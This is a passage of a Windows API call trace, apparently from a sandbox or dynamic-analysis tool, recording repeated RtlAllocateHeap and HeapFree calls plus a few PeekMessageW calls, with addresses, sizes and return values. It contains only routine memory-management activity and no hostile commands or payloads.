dwFlags=0x0, lpMem=0x29add10 | out: hHeap=0x2c0000) returned 1 [0200.304] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0200.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29add10 [0200.304] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0200.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0200.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0200.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0200.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0200.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0200.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0200.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0200.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0200.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0200.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0200.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0200.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0200.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0200.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0200.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0200.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0200.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0200.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0200.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0200.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0200.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0200.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0200.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0200.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0200.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0200.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0200.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0200.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0200.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.351] HeapFree (in: hHeap=0x2c0000, 